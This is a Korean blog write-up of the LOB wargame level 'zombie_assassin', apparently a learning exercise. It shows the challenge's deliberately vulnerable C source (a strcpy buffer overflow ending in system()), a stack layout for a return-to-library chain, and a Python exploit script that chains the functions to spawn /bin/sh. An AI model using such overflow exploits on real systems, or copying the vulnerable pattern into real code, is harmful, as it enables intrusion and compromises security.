본문 바로가기
워게임/LOB

LOB - zombie_assassin(RTL chain)

by meanjung 2021. 8. 8. 
#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>

// the inspector
int check = 0;

void MO(char *cmd)
{
        if(check != 4)
                exit(0);

        printf("welcome to the MO!\n");

        // olleh!
        system(cmd);
}

void YUT(void)
{
        if(check != 3)
                exit(0);

        printf("welcome to the YUT!\n");
        check = 4;
}

void GUL(void)
{
        if(check != 2)
                exit(0);

        printf("welcome to the GUL!\n");
        check = 3;
}

void GYE(void)
{
        if(check != 1)
                exit(0);

        printf("welcome to the GYE!\n");
        check = 2;
}

void DO(void)
{
        printf("welcome to the DO!\n");
        check = 1;
}

main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // you cannot use library
        if(strchr(argv[1], '\x40')){
                printf("You cannot use library\n");
                exit(0);
        }

        // check address
        addr = (char *)&DO;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with DO\n");
                exit(0);
        }

        // overflow!
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // stack destroyer
        // 100 : extra space for copied argv[1]
        memset(buffer, 0, 44);
        memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));

        // LD_* eraser
        // 40 : extra space for memset function
        memset(buffer-3000, 0, 3000-40);
}

--------------------

buffer[40]

--------------------

sfp

--------------------

ret ☞ DO

--------------------

GYE

--------------------

GUL

--------------------

YUT

--------------------

MO

--------------------

dummy

--------------------

/bin/sh 주소

--------------------

/bin/sh

--------------------

 

이렇게 익스해보고, seg fault 뜨면 core dump 파일 분석해서 /bin/sh 주소만 다시 찾아서 익스하면 된다.

 

import os
import struct

p32 = lambda x: struct.pack("<I", x)

DO=0x080487ec
GYE=0x080487bc
GUL=0x0804878c
YUT=0x0804875c
MO=0x08048724

filename = "./succubus"
#filename = "./XXXXXXXX"

payload = p32(DO)+p32(GYE)+p32(GUL)+p32(YUT)+p32(MO)+"AAAA"+p32(0xbffffaa8)+"/bin/sh"
os.execv(filename,[filename, "A"*44 + payload])

'워게임 > LOB' 카테고리의 다른 글

LOB - assassin(semi ROP)  (0) 2021.08.07
LOB - giant (semi ROP)  (0) 2021.08.07
LOB - bugbear(RTL, execve함수)  (0) 2021.08.07
LOB - darkknight(RTL)  (0) 2021.08.05
LOB - golem(SFP overflow)  (0) 2021.08.04

관련글

댓글

티스토리툴바